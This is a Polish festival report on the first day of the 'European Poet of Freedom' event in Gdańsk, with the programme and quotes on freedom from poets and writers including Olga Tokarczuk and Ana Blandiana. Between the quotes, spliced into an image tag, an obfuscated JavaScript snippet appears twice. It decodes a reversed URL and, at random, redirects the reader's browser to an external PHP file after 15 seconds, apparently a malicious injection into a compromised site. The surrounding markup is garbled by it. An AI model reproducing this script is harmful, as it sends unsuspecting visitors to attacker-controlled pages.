Dzień pierwszy EPW: wolność tworzenia, wolność czytania

Osiem godzin rozmów, spotkań, poezji i muzyki, trzynaście języków narodowych, ponad dwudziestu gości – tak wyglądał pierwszy dzień festiwalu Europejski Poeta Wolności. Zapraszamy do przeczytania i obejrzenia krótkiej relacji z najciekawszymi fragmentami wydarzeń.

Dzisiejszy (18.03) program to spotkania Uniwersytetu Poezji Versopolis na Uniwersytecie Gdańskim, spotkania z nominowanymi do Nagrody: Danielem Jonasem (Portugalia), Lidiją Dimkovską (Macedonia) i tłumaczką Yahya Hassana (Dania) Bogusławą Sochańską (Biblioteka pod Żółwiem). Wieczorem, w Instytucie Kultury Miejskiej porozmawiamy o przekładzie z Anną Górecką i Andrzejem Kopackim (w oparciu o najnowszą antologię szkiców o przekładzie, które ukazywały się w “Literaturze na świecie” w latach 1984 – 2015). Krytyczny kwadrans z Karolem Maliszewskim i panel dyskusyjny o poezji europejskiej z udziałem poetów sieci Versopolis. Które momenty zapadną nam w pamięć najbardziej?

epw_dzien1_pomorski

Stratanowski nigdy niczym nie gardzi, kieruje się etyką współczucia. Szanuję tego poetę za to, że nigdy się temu nie sprzeniewierzył. 

Adam Pomorski, tłumacz tomu Graffiti Siergieja Stratanowskiego

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andiana.jpg” rel=”attachment wp-att-1128″>$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andiana-681×1024.jpg” alt=”epw_dzien1_blandiana” width=”681″ height=”1024″ />

To, że po moim zaangażowaniu politycznym i społecznym udało mi się wrócić do poezji, odczuwam jako moje osobiste zwycięstwo.

Ana Blandiana, autorka Moja ojczyzna A4

Wolność czytania. #poetawolnosci #ikm #gdansk #igersgdansk #ilovegdn #poezja #literatura

Film zamieszczony przez użytkownika Magdalena Nestorowicz (@magdanestor)


epw_dzien1_chwin

Nie czuję się człowiekiem wolnym. Ja aspiruję do wolności. Staram się, próbuję wyjść poza ograniczenia, które otaczają ze wszystkich stron.

Stefan Chwin, debata „Sztuka wolności”

epw_dzien1_tokarczuk

My w Polsce bardzo ciężko, ale skutecznie uczyliśmy się tego, czym jest wolność. Jak nie będziemy jej ćwiczyć, to stracimy umiejętność życia w wolności.

Olga Tokarczuk, debata „Sztuka wolności”

epw_dzien1_powell

Artyści bardzo często przetwarzają reguły tworzone przez instytucje. Jako artyści musimy decydować, które z nich będziemy respektować, a które pisać od nowa.

D. A. Powell, debata „Sztuka wolności”

epw-twitter1